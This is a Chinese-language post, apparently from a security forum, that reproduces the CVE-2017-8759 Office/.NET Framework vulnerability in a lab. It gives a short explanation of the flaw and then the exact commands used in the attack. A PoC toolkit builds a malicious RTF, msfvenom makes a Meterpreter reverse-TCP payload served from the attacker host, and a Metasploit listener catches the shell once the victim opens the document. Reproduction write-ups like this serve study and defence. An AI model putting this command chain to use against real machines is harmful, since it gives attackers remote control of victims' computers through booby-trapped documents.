漏洞成因:近日,360集团核心安全事业部分析团队发现一个新型的Office文档高级威胁攻击,攻击使用了9月12日补丁刚修复的.NET Framework漏洞,该漏洞在野外被利用时为0day状态,用户打开恶意的Office文档就会中招。该漏洞的技术原理和今年黑客“奥斯卡”Pwnie Awards上的最佳客户端漏洞(CVE-2017-0199)如出一辙,不同的是,这次黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net库漏洞,在Office文档中加载执行远程的恶意.NET代码,而整个漏洞的罪魁祸首竞是.NET Framework一个换行符处理失误。(出自: 一个换行符引发的奥斯卡0day漏洞(CVE-2017-8759)重现:最新的Office高级威胁攻击预警)
利用文件:这里我直接利用的github上一个大牛的POC,里面详细介绍了用法。
环境搭建:靶机:windows 7 ip:172.16.9.53
攻击机:kali linux ip:172.16.9.110
利用过程:
1.首先获取github上的POC。
2.利用cve-2017-8759_toolkit.py文件生成一个恶意rtf文件invoice.rtf。
python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://172.16.9.110/logo.txt
3.利用msfVENOM生成一个反弹shell的exe文件,并命名为shell.exe。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.9.110 LPORT=4444 -f exe > /root/shell.exe
4.我们需要监听来自ppsx文件执行之后反弹的shell。
pythoncve-2017-8759_toolkit.py -M exp -e http://172.16.9.110/shell.exe -l/root/shell.exe
5.开启metasploit的监听模块exploit/multi/handler进行监听。
msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp;set LHOST 172.16.9.110; run"
6.把恶意rtf文件发送到win7靶机上,当恶意文件被执行后,msf监听到反弹shell,然后建立会话连接,进入meterpreter,即可获取靶机控制权。
至此复现成功,感谢大家的阅读!!!
原文地址:https://bbs.ichunqiu.com/thread-27342-1-1.html